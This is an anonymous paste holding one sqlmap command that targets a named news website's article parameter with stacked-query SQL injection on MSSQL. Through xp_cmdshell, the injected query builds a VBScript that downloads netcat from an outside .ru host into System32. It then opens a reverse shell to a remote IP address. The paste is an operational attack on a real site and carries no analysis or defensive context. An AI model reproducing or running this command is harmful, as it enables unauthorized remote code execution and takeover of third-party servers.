Untitled

a guest
Jul 24th, 2017
python sqlmap.py -u "http://www.chicagobusiness.com/apps/pbcs.dll/exec?name=getarticleinformation&AID=/20170718/NEWS03/170719868" -p AID --dbms=mssql --technique=S --time-sec=1 --sql-query="EXEC xp_cmdshell 'echo strFileURL = \"http://anita-flowers.ru/sstudioinclude/nc.exe\" : strHDLocation = \"c:\Windows\System32\nc.exe\" : Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\"): objXMLHTTP.open \"GET\", strFileURL, false : objXMLHTTP.send() : If objXMLHTTP.Status = 200 Then>d.vbs&echo Set objADOStream = CreateObject(\"ADODB.Stream\"):objADOStream.Open:objADOStream.Type = 1 :objADOStream.Write objXMLHTTP.ResponseBody : objADOStream.Position = 0:Set objFSO = Createobject(\"Scripting.FileSystemObject\") : If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation>>d.vbs&echo Set objFSO = Nothing:objADOStream.SaveToFile strHDLocation:objADOStream.Close:Set objADOStream = Nothing>>d.vbs&echo End if : Set objXMLHTTP = Nothing>>d.vbs&cscript.exe d.vbs&nc.exe -nv 198.211.119.213 31337 -e cmd.exe'" --parse-errors